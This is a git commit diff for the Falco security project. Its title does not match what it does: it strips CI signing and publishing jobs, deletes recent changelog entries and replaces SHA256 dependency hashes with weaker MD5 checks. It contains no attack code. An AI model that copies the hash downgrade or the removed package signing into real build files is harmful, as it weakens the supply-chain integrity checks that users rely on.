Adding falco script from install docs

Signed-off-by: Kris Nova <kris@nivenly.com>

.circleci/config.yml

@@ -32,38 +32,6 @@ jobs:
             pushd build
             make tests
             popd
-  # Debug build using ubuntu LTS
-  # This build is dynamic, most dependencies are taken from the OS
-  "build/ubuntu-bionic-debug":
-    docker:
-      - image: ubuntu:bionic
-    steps:
-      - checkout
-      - run:
-          name: Update base image
-          command: apt update -y
-      - run:
-          name: Install dependencies
-          command: apt install libssl-dev libyaml-dev libncurses-dev libc-ares-dev libprotobuf-dev protobuf-compiler libjq-dev libyaml-cpp-dev libgrpc++-dev protobuf-compiler-grpc rpm linux-headers-$(uname -r) libelf-dev cmake build-essential libcurl4-openssl-dev -y
-      - run:
-          name: Prepare project
-          command: |
-            mkdir build
-            pushd build
-            cmake -DCMAKE_BUILD_TYPE=debug ..
-            popd
-      - run:
-          name: Build
-          command: |
-            pushd build
-            make -j4 all
-            popd
-      - run:
-          name: Run unit tests
-          command: |
-            pushd build
-            make tests
-            popd
   # Build using our own builder base image using centos 7
   # This build is static, dependencies are bundled in the falco binary
   "build/centos7":
@@ -101,28 +69,6 @@ jobs:
       - store_artifacts:
           path: /tmp/packages
           destination: /packages
-  # Debug build using our own builder base image using centos 7
-  # This build is static, dependencies are bundled in the falco binary
-  "build/centos7-debug":
-    docker:
-      - image: falcosecurity/falco-builder:latest
-        environment:
-          BUILD_TYPE: "debug"
-    steps:
-      - checkout:
-          path: /source/falco
-      - run:
-          name: Prepare project
-          command: /usr/bin/entrypoint cmake
-      - run:
-          name: Build
-          command: /usr/bin/entrypoint all
-      - run:
-          name: Run unit tests
-          command: /usr/bin/entrypoint tests
-      - run:
-          name: Build packages
-          command: /usr/bin/entrypoint package
   # Execute integration tests based on the build results coming from the "build/centos7" job
   "tests/integration":
     docker:
@@ -138,227 +84,12 @@ jobs:
       - run:
           name: Execute integration tests
           command: /usr/bin/entrypoint test
-  # Sign rpm packages
-  "rpm/sign":
-    docker:
-      - image: falcosecurity/falco-builder:latest
-    steps:
-      - attach_workspace:
-          at: /
-      - run:
-          name: Install rpmsign
-          command: |
-            yum update -y
-            yum install rpm-sign -y
-      - run:
-          name: Sign rpm
-          command: |
-            echo "%_signature gpg" > ~/.rpmmacros
-            echo "%_gpg_name  Falcosecurity Package Signing" >> ~/.rpmmacros
-            cd /build/release/
-            echo '#!/usr/bin/expect -f' > sign
-            echo 'spawn rpmsign --addsign {*}$argv' >> sign
-            echo 'expect -exact "Enter pass phrase: "' >> sign
-            echo 'send -- "\n"' >> sign
-            echo 'expect eof' >> sign
-            chmod +x sign
-            echo $GPG_KEY | base64 -d | gpg --import
-            ./sign *.rpm
-            test "$(rpm -qpi *.rpm | awk '/Signature/' | grep -i none | wc -l)" -eq 0
-      - persist_to_workspace:
-          root: /
-          paths:
-            - build/release/*.rpm
-  # Publish the packages
-  "publish/packages-dev":
-    docker:
-      - image: docker.bintray.io/jfrog/jfrog-cli-go:latest
-    steps:
-      - attach_workspace:
-          at: /
-      - run:
-          name: Create versions
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt vs falcosecurity/deb-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/deb-dev/falco/${FALCO_VERSION} --desc="Falco (master)" --github-rel-notes=CHANGELOG.md --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_SHA1} --user poiana --key ${BINTRAY_SECRET}
-            jfrog bt vs falcosecurity/rpm-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/rpm-dev/falco/${FALCO_VERSION} --desc="Falco (master)" --github-rel-notes=CHANGELOG.md --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_SHA1} --user poiana --key ${BINTRAY_SECRET}
-            jfrog bt vs falcosecurity/bin-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/bin-dev/falco/${FALCO_VERSION} --desc="Falco (master)" --github-rel-notes=CHANGELOG.md --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_SHA1} --user poiana --key ${BINTRAY_SECRET}
-      - run:
-          name: Publish deb-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.deb falcosecurity/deb-dev/falco/${FALCO_VERSION} stable/ --deb stable/main/amd64 --user poiana --key ${BINTRAY_SECRET} --publish --override
-      - run:
-          name: Publish rpm-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.rpm falcosecurity/rpm-dev/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} --publish --override
-      - run:
-          name: Publish tgz-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin-dev/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
-  # Publish docker packages
-  "publish/docker-dev":
-    docker:
-      - image: docker:stable
-    steps:
-      - attach_workspace:
-          at: /
-      - checkout
-      - setup_remote_docker
-      - run:
-          name: Build and publish slim-dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master-slim docker/slim
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push falcosecurity/falco:master-slim
-      - run:
-          name: Build and publish dev
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            docker build --build-arg VERSION_BUCKET=deb-dev --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:master docker/stable
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push falcosecurity/falco:master
-      - run:
-          name: Build and publish dev falco-driver-loader-dev
-          command: |
-            docker build --build-arg FALCO_IMAGE_TAG=master -t falcosecurity/falco-driver-loader:master docker/driver-loader
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push falcosecurity/falco-driver-loader:master
-  # Publish the packages
-  "publish/packages":
-    docker:
-      - image: docker.bintray.io/jfrog/jfrog-cli-go:latest
-    steps:
-      - attach_workspace:
-          at: /
-      - run:
-          name: Create versions
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt vs falcosecurity/deb/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/deb/falco/${FALCO_VERSION} --desc="Falco (${CIRCLE_TAG})" --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_TAG} --user poiana --key ${BINTRAY_SECRET}
-            jfrog bt vs falcosecurity/rpm/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/rpm/falco/${FALCO_VERSION} --desc="Falco (${CIRCLE_TAG})" --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_TAG} --user poiana --key ${BINTRAY_SECRET}
-            jfrog bt vs falcosecurity/bin/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} || jfrog bt vc falcosecurity/bin/falco/${FALCO_VERSION} --desc="Falco (${CIRCLE_TAG})" --released=$(date -u +"%Y-%m-%dT%H:%M:%S.000Z") --vcs-tag=${CIRCLE_TAG} --user poiana --key ${BINTRAY_SECRET}
-      - run:
-          name: Publish deb
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.deb falcosecurity/deb/falco/${FALCO_VERSION} stable/ --deb stable/main/amd64 --user poiana --key ${BINTRAY_SECRET} --publish --override
-      - run:
-          name: Publish rpm
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.rpm falcosecurity/rpm/falco/${FALCO_VERSION} --user poiana --key ${BINTRAY_SECRET} --publish --override
-      - run:
-          name: Publish tgz
-          command: |
-            FALCO_VERSION=$(cat /build/release/userspace/falco/config_falco.h | grep 'FALCO_VERSION ' | cut -d' ' -f3 | sed -e 's/^"//' -e 's/"$//')
-            jfrog bt u /build/release/falco-${FALCO_VERSION}-x86_64.tar.gz falcosecurity/bin/falco/${FALCO_VERSION} x86_64/ --user poiana --key ${BINTRAY_SECRET} --publish --override
-  # Publish docker packages
-  "publish/docker":
-    docker:
-      - image: docker:stable
-    steps:
-      - attach_workspace:
-          at: /
-      - checkout
-      - setup_remote_docker
-      - run:
-          name: Build and publish slim
-          command: |
-            docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}-slim" docker/slim
-            docker tag "falcosecurity/falco:${CIRCLE_TAG}-slim" falcosecurity/falco:latest-slim
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push "falcosecurity/falco:${CIRCLE_TAG}-slim"
-            docker push "falcosecurity/falco:latest-slim"
-      - run:
-          name: Build and publish stable
-          command: |
-            docker build --build-arg VERSION_BUCKET=deb --build-arg FALCO_VERSION=${CIRCLE_TAG} -t "falcosecurity/falco:${CIRCLE_TAG}" docker/stable
-            docker tag "falcosecurity/falco:${CIRCLE_TAG}" falcosecurity/falco:latest
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push "falcosecurity/falco:${CIRCLE_TAG}"
-            docker push "falcosecurity/falco:latest"
-      - run:
-          name: Build and publish falco-driver-loader
-          command: |
-            docker build --build-arg FALCO_IMAGE_TAG=${CIRCLE_TAG} -t "falcosecurity/falco-driver-loader:${CIRCLE_TAG}" docker/driver-loader
-            docker tag "falcosecurity/falco-driver-loader:${CIRCLE_TAG}" falcosecurity/falco-driver-loader:latest
-            echo ${DOCKERHUB_SECRET} | docker login -u ${DOCKERHUB_USER} --password-stdin
-            docker push "falcosecurity/falco-driver-loader:${CIRCLE_TAG}"
-            docker push "falcosecurity/falco-driver-loader:latest"
 workflows:
   version: 2
   build_and_test:
     jobs:
       - "build/ubuntu-bionic"
-      - "build/ubuntu-bionic-debug"
       - "build/centos7"
-      - "build/centos7-debug"
       - "tests/integration":
           requires:
             - "build/centos7"
-      - "rpm/sign":
-          context: falco
-          filters:
-            tags:
-              ignore: /.*/
-            branches:
-              only: master
-          requires:
-            - "tests/integration"
-      - "publish/packages-dev":
-          context: falco
-          filters:
-            tags:
-              ignore: /.*/
-            branches:
-              only: master
-          requires:
-            - "rpm/sign"
-      - "publish/docker-dev":
-          context: falco
-          filters:
-            tags:
-              ignore: /.*/
-            branches:
-              only: master
-          requires:
-            - "publish/packages-dev"
-  release:
-    jobs:
-      - "build/centos7":
-          filters:
-            tags:
-              only: /.*/
-            branches:
-              ignore: /.*/
-      - "rpm/sign":
-          context: falco
-          requires:
-            - "build/centos7"
-          filters:
-            tags:
-              only: /.*/
-            branches:
-              ignore: /.*/
-      - "publish/packages":
-          context: falco
-          requires:
-            - "rpm/sign"
-          filters:
-            tags:
-              only: /.*/
-            branches:
-              ignore: /.*/
-      - "publish/docker":
-          context: falco
-          requires:
-            - "publish/packages"
-          filters:
-            tags:
-              only: /.*/
-            branches:
-              ignore: /.*/

.gitignore

@@ -16,6 +16,12 @@ userspace/falco/lua/lpeg.so
 userspace/engine/lua/lyaml
 userspace/engine/lua/lyaml.lua
 
+docker/event-generator/event_generator
+docker/event-generator/mysqld
+docker/event-generator/httpd
+docker/event-generator/sha1sum
+docker/event-generator/vipw
+
 .vscode/*
 
 .luacheckcache

CHANGELOG.md

@@ -2,138 +2,6 @@
 
 This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
 
-## v0.22.1
-
-Released on 2020-17-04
-
-### Major Changes
-
-* Same as v0.22.0
-
-### Minor Changes
-
-* Same as v0.22.0
-
-### Bug Fixes
-
-* fix: correct driver path (/usr/src/falco-%driver_version%) for RPM package [[#1148](https://github.com/falcosecurity/falco/pull/1148)]
-
-### Rule Changes
-
-* Same as v0.22.0
-
-## v0.22.0
-
-Released on 2020-16-04
-
-### Major Changes
-
-* new: falco version and driver version are distinct and not coupled anymore [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
-* new: flag to disable asynchronous container metadata (CRI) fetch `--disable-cri-async` [[#1099](https://github.com/falcosecurity/falco/pull/1099)]
-
-
-### Minor Changes
-
-* docs(integrations): update API resource versions to Kubernetes 1.16 [[#1044](https://github.com/falcosecurity/falco/pull/1044)]
-* docs: add new release archive to the `README.md` [[#1098](https://github.com/falcosecurity/falco/pull/1098)]
-* update: driver version a259b4bf49c3 [[#1138](https://github.com/falcosecurity/falco/pull/1138)]
-* docs(integrations/k8s-using-daemonset): --cri flag correct socket path [[#1140](https://github.com/falcosecurity/falco/pull/1140)]
-* update: bump driver version to cd3d10123e [[#1131](https://github.com/falcosecurity/falco/pull/1131)]
-* update(docker): remove RHEL, kernel/linuxkit, and kernel/probeloader images [[#1124](https://github.com/falcosecurity/falco/pull/1124)]
-* update: falco-probe-loader script is falco-driver-loader now [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
-* update: using only sha256 hashes when pulling build dependencies [[#1118](https://github.com/falcosecurity/falco/pull/1118)]
-
-
-### Bug Fixes
-
-* fix(integrations/k8s-using-daemonset): added missing privileges for the apps Kubernetes API group in the falco-cluster-role when using RBAC [[#1136](https://github.com/falcosecurity/falco/pull/1136)]
-* fix: connect to docker works also with libcurl >= 7.69.0 [[#1138](https://github.com/falcosecurity/falco/pull/1138)]
-* fix: HOST_ROOT environment variable detection [[#1133](https://github.com/falcosecurity/falco/pull/1133)]
-* fix(driver/bpf): stricter conditionals while dealing with strings [[#1131](https://github.com/falcosecurity/falco/pull/1131)]
-* fix: `/usr/bin/falco-${DRIVER_VERSION}` driver directory [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
-* fix: FALCO_VERSION env variable inside Falco containers contains the Falco version now (not the docker image tag) [[#1111](https://github.com/falcosecurity/falco/pull/1111)]
-
-
-### Rule Changes
-
-* rule(macro user_expected_system_procs_network_activity_conditions): allow whitelisting system binaries using the network under specific conditions [[#1070](https://github.com/falcosecurity/falco/pull/1070)]
-* rule(Full K8s Administrative Access): detect any k8s operation by an administrator with full access [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Ingress Object without TLS Certificate Created): detect any attempt to create an ingress without TLS certification (rule enabled by default) [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Untrusted Node Successfully Joined the Cluster): detect a node successfully joined the cluster outside of the list of allowed nodes [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Untrusted Node Unsuccessfully Tried to Join the Cluster): detect an unsuccessful attempt to join the cluster for a node not in the list of allowed nodes [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Network Connection outside Local Subnet): detect traffic to image outside local subnet [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Outbound or Inbound Traffic not to Authorized Server Process and Port): detect traffic that is not to authorized server process and port [[#1122](https://github.com/falcosecurity/falco/pull/1122)]
-* rule(Delete or rename shell history): "mitre_defense_evation" tag corrected to "mitre_defense_evasion" [[#1143](https://github.com/falcosecurity/falco/pull/1143)]
-* rule(Delete Bash History): "mitre_defense_evation" tag corrected to "mitre_defense_evasion" [[#1143](https://github.com/falcosecurity/falco/pull/1143)]
-* rule(Write below root): use pmatch to check against known root directories [[#1137](https://github.com/falcosecurity/falco/pull/1137)]
-* rule(Detect outbound connections to common miner pool ports): whitelist sysdig/agent and falcosecurity/falco for query miner domain dns [[#1115](https://github.com/falcosecurity/falco/pull/1115)]
-* rule(Service Account Created in Kube Namespace): only detect sa created in kube namespace with success [[#1117](https://github.com/falcosecurity/falco/pull/1117)]
-
-## v0.21.0
-
-Released on 2020-03-17
-
-### Major Changes
-
-* BREAKING CHANGE: the SYSDIG_BPF_PROBE environment variable is now just FALCO_BPF_PROBE (please update your systemd scripts or kubernetes deployments. [[#1050](https://github.com/falcosecurity/falco/pull/1050)]
-* new: automatically publish deb packages (from git master branch) to public dev repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically publish rpm packages (from git master branch) to public dev repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically release deb packages (from git tags) to public repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically release rpm packages (from git tags) to public repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically publish docker images from master (master, master-slim, master-minimal) [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: automatically publish docker images from git tag (tag, tag-slim, tag-master, latest, latest-slim, latest-minimal) [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* new: sign packages with falcosecurity gpg key [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-
-### Minor Changes
-
-* new: falco_version_prerelease contains the number of commits since last tag on the master [[#1086](https://github.com/falcosecurity/falco/pull/1086)]
-* docs: update branding [[#1074](https://github.com/falcosecurity/falco/pull/1074)]
-* new(docker/event-generator): add example k8s resource files that allow running the event generator in a k8s cluster. [[#1088](https://github.com/falcosecurity/falco/pull/1088)]
-* update: creating *-dev docker images using build arguments at build time [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* update: docker images use packages from the new repositories [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* update: docker image downloads old deb dependencies (gcc-6, gcc-5, binutils-2.30) from a new open repository [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-
-### Bug Fixes
-
-* fix(docker): updating `stable` and `local` images to run from `debian:stable` [[#1018](https://github.com/falcosecurity/falco/pull/1018)]
-* fix(event-generator): the image used by the event generator deployment to `latest`. [[#1091](https://github.com/falcosecurity/falco/pull/1091)]
-* fix: -t (to disable rules by certain tag) or -t (to only run rules with a certain tag) work now [[#1081](https://github.com/falcosecurity/falco/pull/1081)]
-* fix: the falco driver now compiles on >= 5.4 kernels [[#1080](https://github.com/falcosecurity/falco/pull/1080)]
-* fix: download falco packages which url contains character to encode - eg, `+` [[#1059](https://github.com/falcosecurity/falco/pull/1059)]
-* fix(docker): use base name in docker-entrypoint.sh [[#981](https://github.com/falcosecurity/falco/pull/981)]
-
-### Rule Changes
-
-* rule(detect outbound connections to common miner pool ports): disabled by default [[#1061](https://github.com/falcosecurity/falco/pull/1061)]
-* rule(macro net_miner_pool): add localhost and rfc1918 addresses as exception in the rule. [[#1061](https://github.com/falcosecurity/falco/pull/1061)]
-* rule(change thread namespace): modify condition to detect suspicious container activity [[#974](https://github.com/falcosecurity/falco/pull/974)]
-
-## v0.20.0
-
-Released on 2020-02-24
-
-### Major Changes
-
-* fix: memory leak introduced in 0.18.0 happening while using json events and the kubernetes audit endpoint [[#1041](https://github.com/falcosecurity/falco/pull/1041)]
-* new: grpc version api [[#872](https://github.com/falcosecurity/falco/pull/872)]
-
-
-### Bug Fixes
-
-* fix: the base64 output format (-b) now works with both json and normal output. [[#1033](https://github.com/falcosecurity/falco/pull/1033)]
-* fix: version follows semver 2 bnf [[#872](https://github.com/falcosecurity/falco/pull/872)]
-
-### Rule Changes
-
-* rule(write below etc): add "dsc_host" as a ms oms program [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(write below etc): let mcafee write to /etc/cma.d  [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(write below etc): let avinetworks supervisor write some ssh cfg [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(write below etc): alow writes to /etc/pki from openshift secrets dir [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(write below root): let runc write to /exec.fifo [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(change thread namespace): let cilium-cni change namespaces [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-* rule(run shell untrusted): let puma reactor spawn shells [[#1028](https://github.com/falcosecurity/falco/pull/1028)]
-
-
 ## v0.19.0
 
 Released on 2020-01-23
@@ -249,7 +117,7 @@ Released 2019-09-26
 
 * Same as v0.17.0
 
-### Minor Changes
+##
 
 * Same as v0.17.0
 

CMakeLists.txt

@@ -17,8 +17,8 @@ project(falco)
 option(USE_BUNDLED_DEPS "Bundle hard to find dependencies into the Falco binary" OFF)
 option(BUILD_WARNINGS_AS_ERRORS "Enable building with -Wextra -Werror flags" OFF)
 
-# Elapsed time set_property(GLOBAL PROPERTY RULE_LAUNCH_COMPILE "${CMAKE_COMMAND} -E time") # TODO(fntlnz, leodido): add
-# a flag to enable this
+# Elapsed time
+# set_property(GLOBAL PROPERTY RULE_LAUNCH_COMPILE "${CMAKE_COMMAND} -E time") # TODO(fntlnz, leodido): add a flag to enable this
 
 # Make flag for parallel processing
 include(ProcessorCount)
@@ -48,7 +48,6 @@ else()
   set(CMAKE_BUILD_TYPE "release")
   set(KBUILD_FLAGS "${DRAIOS_FEATURE_FLAGS}")
 endif()
-message(STATUS "Build type: ${CMAKE_BUILD_TYPE}")
 
 set(CMAKE_COMMON_FLAGS "-Wall -ggdb ${DRAIOS_FEATURE_FLAGS}")
 
@@ -71,9 +70,9 @@ set(CMAKE_CXX_FLAGS_RELEASE "-O3 -fno-strict-aliasing -DNDEBUG")
 include(GetFalcoVersion)
 
 set(PACKAGE_NAME "falco")
-set(PROBE_NAME "falco")
+set(PROBE_VERSION "${FALCO_VERSION}")
+set(PROBE_NAME "falco-probe")
 set(PROBE_DEVICE_NAME "falco")
-set(DRIVERS_REPO "https://dl.bintray.com/falcosecurity/driver")
 if(CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT)
   set(CMAKE_INSTALL_PREFIX
       /usr
@@ -94,12 +93,13 @@ set(NJSON_INCLUDE "${NJSON_SRC}/single_include")
 ExternalProject_Add(
   njson
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/njson-3.3.0.tar.gz"
-  URL_HASH "SHA256=2fd1d207b4669a7843296c41d3b6ac5b23d00dec48dba507ba051d14564aa801"
+  URL_MD5 "e26760e848656a5da400662e6c5d999a"
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ""
   INSTALL_COMMAND "")
 
-# curses We pull this in because libsinsp won't build without it
+# curses
+# We pull this in because libsinsp won't build without it
 set(CURSES_NEED_NCURSES TRUE)
 find_package(Curses REQUIRED)
 message(STATUS "Found ncurses: include: ${CURSES_INCLUDE_DIR}, lib: ${CURSES_LIBRARIES}")
@@ -112,7 +112,7 @@ set(B64_LIB "${B64_SRC}/src/libb64.a")
 ExternalProject_Add(
   b64
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
-  URL_HASH "SHA256=343d8d61c5cbe3d3407394f16a5390c06f8ff907bd8d614c16546310b689bfd3"
+  URL_MD5 "a609809408327117e2c643bed91b76c5"
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ${CMD_MAKE}
   BUILD_IN_SOURCE 1
@@ -135,7 +135,7 @@ set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
 ExternalProject_Add(
   luajit
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
-  URL_HASH "SHA256=55be6cb2d101ed38acca32c5b1f99ae345904b365b642203194c585d27bebd79"
+  URL_MD5 "f14e9104be513913810cd59c8c658dc0"
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ${CMD_MAKE}
   BUILD_IN_SOURCE 1
@@ -151,7 +151,7 @@ ExternalProject_Add(
   lpeg
   DEPENDS ${LPEG_DEPENDENCIES}
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
-  URL_HASH "SHA256=10190ae758a22a16415429a9eb70344cf29cbda738a6962a9f94a732340abf8e"
+  URL_MD5 "0aec64ccd13996202ad0c099e2877ece"
   BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
   BUILD_IN_SOURCE 1
   CONFIGURE_COMMAND ""
@@ -175,14 +175,14 @@ ExternalProject_Add(
   lyaml
   DEPENDS ${LYAML_DEPENDENCIES}
   URL "https://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
-  URL_HASH "SHA256=9d7cf74d776999ff6f758c569d5202ff5da1f303c6f4229d3b41f71cd3a3e7a7"
+  URL_MD5 "dc3494689a0dce7cf44e7a99c72b1f30"
   BUILD_COMMAND ${CMD_MAKE}
   BUILD_IN_SOURCE 1
   CONFIGURE_COMMAND ./configure --enable-static LIBS=-lyaml LUA_INCLUDE=-I${LUAJIT_INCLUDE} LUA=${LUAJIT_SRC}/luajit
   INSTALL_COMMAND sh -c
                   "cp -R ${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/lib/* ${PROJECT_SOURCE_DIR}/userspace/engine/lua")
 
-# One TBB
+# Intel TBB
 set(TBB_SRC "${PROJECT_BINARY_DIR}/tbb-prefix/src/tbb")
 
 message(STATUS "Using bundled tbb in '${TBB_SRC}'")
@@ -191,8 +191,8 @@ set(TBB_INCLUDE_DIR "${TBB_SRC}/include/")
 set(TBB_LIB "${TBB_SRC}/build/lib_release/libtbb.a")
 ExternalProject_Add(
   tbb
-  URL "https://github.com/oneapi-src/oneTBB/archive/2018_U5.tar.gz"
-  URL_HASH "SHA256=b8dbab5aea2b70cf07844f86fa413e549e099aa3205b6a04059ca92ead93a372"
+  URL "https://github.com/intel/tbb/archive/2018_U5.tar.gz"
+  URL_MD5 "ff3ae09f8c23892fbc3008c39f78288f"
   CONFIGURE_COMMAND ""
   BUILD_COMMAND ${CMD_MAKE} tbb_build_dir=${TBB_SRC}/build tbb_build_prefix=lib extra_inc=big_iron.inc
   BUILD_IN_SOURCE 1
@@ -207,19 +207,13 @@ message(STATUS "Using bundled civetweb in '${CIVETWEB_SRC}'")
 ExternalProject_Add(
   civetweb
   URL "https://github.com/civetweb/civetweb/archive/v1.11.tar.gz"
-  URL_HASH "SHA256=de7d5e7a2d9551d325898c71e41d437d5f7b51e754b242af897f7be96e713a42"
+  URL_MD5 "b6d2175650a27924bccb747cbe084cd4"
   CONFIGURE_COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/lib
   COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/include
   BUILD_IN_SOURCE 1
   BUILD_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" WITH_CPP=1
   INSTALL_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" install-lib install-headers PREFIX=${CIVETWEB_SRC}/install "WITH_CPP=1")
 
-# Hedley
-include(DownloadHedley)
-
-# FlatBuffers
-include(FlatBuffers)
-
 # gRPC
 include(gRPC)
 
@@ -241,8 +235,8 @@ add_subdirectory(rules)
 # Dockerfiles
 add_subdirectory(docker)
 
-# Clang format add_custom_target(format COMMAND clang-format --style=file -i $<TARGET_PROPERTY:falco,SOURCES> COMMENT
-# "Formatting ..." VERBATIM)
+# Clang format
+# add_custom_target(format COMMAND clang-format --style=file -i $<TARGET_PROPERTY:falco,SOURCES> COMMENT "Formatting ..." VERBATIM)
 
 # Shared build variables
 set(FALCO_SINSP_LIBRARY sinsp)
@@ -251,7 +245,6 @@ set(FALCO_ABSOLUTE_SHARE_DIR "${CMAKE_INSTALL_PREFIX}/${FALCO_SHARE_DIR}")
 set(FALCO_BIN_DIR bin)
 
 add_subdirectory(scripts)
-add_subdirectory(userspace/profiler)
 add_subdirectory(userspace/engine)
 add_subdirectory(userspace/falco)
 add_subdirectory(tests)

CONTRIBUTING.md

@@ -11,7 +11,6 @@
       - [Rule type](#rule-type)
   - [Coding Guidelines](#coding-guidelines)
     - [C++](#c)
-    - [Unit testing](/tests/README.md)
   - [Developer Certificate Of Origin](#developer-certificate-of-origin)
 
 ## Code of Conduct

README.md

@@ -5,18 +5,13 @@
 
 # The Falco Project
 
+#### Latest release
+
+**v0.19.0**
+Read the [change log](CHANGELOG.md)
+
